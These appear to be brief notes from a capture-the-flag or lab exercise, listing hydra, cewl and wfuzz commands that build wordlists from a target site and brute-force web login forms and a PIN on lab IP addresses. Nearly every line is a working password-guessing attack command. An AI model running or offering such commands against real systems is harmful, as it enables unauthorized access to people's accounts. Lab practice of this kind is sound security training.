
Brute force from previous challenge
hydra -l '' -P 3digits.txt -f -v 10.10.75.137 http-post-form \"/login.php:pin=^PASS^:Access denied\" -s 8000


get usernames
cewl -d 0 -m 5 -w usernames.txt http://10.10.65.76/team.php --lowercase

get passwords
cewl -d 2 -m 5 -w passwords.txt http://10.10.65.76 --with-numbers

the fuzzing way:
wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://10.10.65.76/login.php -d "username=FUZZ&password=FUZ2Z"

the hydra way:
hydra -L usernames.txt -P passwords.txt -f -v 10.10.65.76 http-post-form "/login.php:username=^USER^&password=^PASS^:Please enter the correct credentials" 

